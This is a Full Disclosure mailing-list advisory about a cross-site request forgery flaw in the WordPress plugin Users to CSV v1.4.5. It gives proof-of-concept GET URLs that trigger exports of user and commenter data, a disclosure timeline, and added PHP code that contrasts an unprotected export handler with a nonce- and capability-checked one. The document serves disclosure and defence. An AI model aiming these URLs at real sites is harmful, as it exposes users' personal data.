Message-ID: <CAARZ5vo2WrgeN1m5L_FpFuHO5OAUQEfrUQMvQJqD9=Dw1T21eA@mail.gmail.com>
Date: Mon, 15 Jun 2015 13:15:01 +0000
From: Nitin Venkatesh <venkatesh.nitin@...il.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Cross-Site Request Forgery Vulnerability in Users to CSV Wordpress Plugin v1.4.5
# Title: Cross-Site Request Forgery Vulnerability in Users to CSV Wordpress Plugin v1.4.5
# Submitter: Nitin Venkatesh
# Product: Users to CSV Wordpress Plugin
# Product URL: https://wordpress.org/plugins/users-to-csv/ (disabled)
# Plugin SVN URL: https://plugins.svn.wordpress.org/users-to-csv/ (active)
# Vulnerability Type: Cross-site Request Forgery [CWE-352]
# Affected Versions: v1.4.5 and possibly below.
# Tested versions: v1.4.5
# Fixed Version: None. Support for the plugin has been discontinued.
# CVE Status: None/Unassigned/Fresh
## Product Information:
This plugin adds an admin screen under "Users", giving two options:
exporting the current users to a csv file and exporting the unique
commenters on your blog to a csv file.
## Vulnerability Description:
User information can be exported by a plain GET request to users.php, which makes the export vulnerable to CSRF.
## Proof of Concept:
http://localhost/wp-admin/users.php?page=users2csv.php&csv=true&table=users
http://localhost/wp-admin/users.php?page=users2csv.php&csv=true&table=comments
## Solution:
Disable the plugin; support for it has ceased.
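For maintainers of forks or of similar export plugins, the following is an added example (not the plugin's own code, and not a patch for it) of the two checks whose absence produces this class of issue: a WordPress capability check and a nonce tied to the export action. The function names, the `u2csv-example` page slug and the `u2csv_example_export` nonce action are hypothetical; the WordPress APIs used (`add_users_page`, `wp_nonce_url`, `check_admin_referer`, `current_user_can`, `get_users`, `get_comments`) are real.

```php
<?php
// Added example, not the Users to CSV plugin's code. All u2csv_example_* names are hypothetical.

// --- CSRF-prone pattern (shown for contrast, deliberately not hooked) ---
// Any GET carrying csv=true triggers the export: no nonce, no capability check,
// so a link the admin's browser is made to follow is enough to fire it.
function u2csv_example_export_unprotected() {
    if ( isset( $_GET['csv'] ) && 'true' === $_GET['csv'] ) {
        u2csv_example_stream_csv( 'users' );
        exit;
    }
}

// --- Hardened pattern ---
function u2csv_example_register_menu() {
    // Menu entry under "Users"; only users with list_users can even see it.
    add_users_page( 'Users to CSV', 'Users to CSV', 'list_users',
        'u2csv-example', 'u2csv_example_render_page' );
}
add_action( 'admin_menu', 'u2csv_example_register_menu' );

function u2csv_example_render_page() {
    // Each export link carries a nonce bound to this action and the current user.
    foreach ( array( 'users', 'comments' ) as $table ) {
        $url = wp_nonce_url(
            admin_url( 'users.php?page=u2csv-example&csv=true&table=' . $table ),
            'u2csv_example_export'
        );
        echo '<p><a class="button" href="' . esc_url( $url ) . '">Export ' . esc_html( $table ) . '</a></p>';
    }
}

function u2csv_example_maybe_export() {
    if ( ! isset( $_GET['page'], $_GET['csv'] )
        || 'u2csv-example' !== $_GET['page'] || 'true' !== $_GET['csv'] ) {
        return;
    }
    // 1. Capability check: the caller must be allowed to read the user list.
    if ( ! current_user_can( 'list_users' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // 2. Nonce check: a request forged from another origin lacks a valid _wpnonce
    //    for this action and is rejected here with a 403.
    check_admin_referer( 'u2csv_example_export' );
    // 3. Allow-list the table parameter rather than trusting it.
    $table = ( isset( $_GET['table'] ) && 'comments' === $_GET['table'] ) ? 'comments' : 'users';
    u2csv_example_stream_csv( $table );
    exit;
}
// admin_init runs before any admin page output, so headers can still be sent.
add_action( 'admin_init', 'u2csv_example_maybe_export' );

function u2csv_example_stream_csv( $table ) {
    header( 'Content-Type: text/csv; charset=utf-8' );
    header( 'Content-Disposition: attachment; filename="' . $table . '.csv"' );
    $out = fopen( 'php://output', 'w' );
    if ( 'comments' === $table ) {
        // Unique commenters, keyed by e-mail address.
        fputcsv( $out, array( 'comment_author', 'comment_author_email' ) );
        $seen = array();
        foreach ( get_comments( array( 'status' => 'approve' ) ) as $c ) {
            if ( isset( $seen[ $c->comment_author_email ] ) ) {
                continue;
            }
            $seen[ $c->comment_author_email ] = true;
            fputcsv( $out, array( $c->comment_author, $c->comment_author_email ) );
        }
    } else {
        fputcsv( $out, array( 'ID', 'user_login', 'user_email' ) );
        foreach ( get_users( array( 'fields' => array( 'ID', 'user_login', 'user_email' ) ) ) as $u ) {
            fputcsv( $out, array( $u->ID, $u->user_login, $u->user_email ) );
        }
    }
    fclose( $out );
}
```

`check_admin_referer` verifies the `_wpnonce` query argument that `wp_nonce_url` appended and dies on mismatch, so a request that did not originate from a link rendered for this user on this site never reaches the export. The capability check is kept separate because a nonce proves origin, not authorization; the two answer different questions and both are needed.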
## Disclosure Timeline:
2015-06-08 - Discovered. Contacted developer.
2015-06-08 - Developer responds that support for plugin has ceased.
2015-06-13 - Noticed plugin site has been disabled. It must’ve happened somewhere between 2015-06-09 and 2015-06-13. Contacted developer for re-confirmation.
2015-06-14 - Developer gives go-ahead for publishing a disclosure.
2015-06-15 - Publishing disclosure on Full Disclosure mailing list.
## Disclaimer:
This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/